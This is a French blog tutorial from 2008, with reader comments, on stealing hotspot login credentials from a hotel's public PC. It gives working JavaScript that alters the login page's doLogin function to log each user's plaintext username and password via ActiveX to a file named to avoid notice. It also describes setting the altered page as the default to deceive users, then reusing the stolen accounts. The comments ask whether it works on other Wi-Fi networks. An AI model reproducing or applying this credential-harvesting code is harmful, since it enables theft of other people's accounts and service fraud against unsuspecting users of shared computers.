Hamza Security Blog

Idées de hack .Idée N°2 : Hacker Un HOTSPOT en récupérons les Login et mot de passe

Posté le 23 août,2008 Par admin | Sous Tutorial | Commentaires (8)

Dans cette deuxième idée je vais expliquer comment on peut récupérer les Login et mot de passe de connexion HotSpot sans snifing sans KeyLoger , pour se connecter à internet.

L’hôtel ibis Meknès met a la disposition des utilisateurs un PC de bureau avec internet explorer pour un tarif de 60 DH pour une demie heure et 100 DH l’heur qui est extrêmement chère quand l’accès a l information et a l’internet est nécessaire et indispensable.

Si vous n’avez pas de pc pour snifer les login et mot de passe qui sont dans ce cas précis cryptée a l’aide d un script JavaScript très utile pour crypter le mot de passe avant de l’envoyer . Il dispose de 4 fonction :

function hexMD5 (str)
function hexMD5w(str)
function b64MD5 (str)
function b64MD5w(str)
function calcMD5(str)

vous pouvez le télécharger sur : http://pajhome.org.uk/crypt/md5/3.0/md5-2.2alpha.js

L’idée est de stocker les informations d’authentification sur le pc lui-même et les récupérer âpres la connexion des utilisateurs qui son munie d un login et un mot de passe d’Access.

Comme je n ai pas d’outils à installer comme un Key loger j’ai décidé de

1. Enregistrer la page d’authentifications html
2. Modifier l’action Script du formulaire pour enregistrer les mots de passes avant de s’authentifier
3. Lancer la page comme page par défaut pour tromper les utilisateurs

Pour coder un script qui enregistre les données de la page web sur le bureau il faut activer les contrôle ActiveX sous internet explorer outil > option internet > sécurité > Personnaliser le niveau>Contrôle ACtiveX

Cette action est très déconseillée pour l’utilisation normal mais nécessaire pour exécuter a bien cette attaque.

Sur la Page d authentification on retrouve le code :

function doLogin() {
document.sendin.username.value = document.login.username.value;
document.sendin.password.value = hexMD5(‘\155′ + document.login.password.value + ‘\010\147\337\136\064\226\371\272\364\277\015\362\110\360\173\037′);
document.sendin.submit();
}

Ce qui permet de coder le mot de passe avant de l’envoyer dans notre cas on va récupérer le mot de passe dans le fichier avant de le crypter donc on ajoute le code suivant avant l’envoi des informations

function doLogin() {

var fso=new ActiveXObject(« Scripting.FileSystemObject »); //Création du Système de fichier.
var otf=fso.OpenTextFile(« Presentation.txt », 8 ,true); //Ouverture du fichier « Presentation.txt »  //qu’on a cree sur le bureau pour ne pas attirer l’attention
otf.WriteLine(document.login.username.value); //Ecriture de la ligne « Login ».
otf.WriteLine(document.login.password.value); //Ecriture de la ligne « pass ».
otf.Close(); //Fermeture du fichier  » Presentation.txt »
document.sendin.username.value = document.login.username.value;
document.sendin.password.value = hexMD5(‘\155′ + document.login.password.value + ‘\010\147\337\136\064\226\371\272\364\277\015\362\110\360\173\037′);
document.sendin.submit();
}

Après l’authentification on récupère le fichier et on test les Combinaison ou il reste encore du temps de connexion.

En ce qui me concerne il me reste 45 minutes

Article Similaire :

• Idées de hack .Idée N°1 : Hacker Un HOTSPOT avec un Proxy
• Générer le mot de passe Root des routeurs sagem Fast 3304-V1 / 3304-V2 / 3464 / 3504
• Changer le mot de passe du SAGEM FAST3304-V2 de Maroc Telecom
• Medusa 1.5 : outil de Brute Force de mot de passe
• 49 millions de mot de passe WPA pour cracker le WIFI

Tagged : HotSpot, Mot de passe

8 commentaires pour “Idées de hack .Idée N°2 : Hacker Un HOTSPOT en récupérons les Login et mot de passe”

1. RYErnest Says:
   novembre 29, 2008 at 2:10

   Nice post u have here Added to my RSS reader
2. anwar Says:
   février 13, 2009 at 2:33

   momkin i5tira9 jami3 chbakt antirinet bratile
3. anwar Says:
   février 13, 2009 at 2:34

   likir
4. Reda Says:
   décembre 21, 2009 at 11:13

   tres bel article…
5. issamux Says:
   janvier 30, 2010 at 11:03

   pas mal comme idée
6. Piracker Says:
   mai 18, 2010 at 9:40

   Ok pas mal a j’essairais et sinon pour ce qui est de Neuf Wifi, Free Wifi etc…
   ca fonctionne avec le meme hack? moi perso je suis plus pour l’utilisation de aircrack et airsnarf comme pour le crack de clé wep mais c’est un peu plus long a mettre en place
7. admin Says:
   mai 19, 2010 at 11:38

   vous pouvez mais les Hotspot sont souvent sans protection wep ou wap .
8. Tourrant Says:
   juillet 12, 2011 at 7:25

   Cela marche avec un hotspot neuf box sans risque ?
   Sachant que j’ai un anti virus de merde… =) merci bien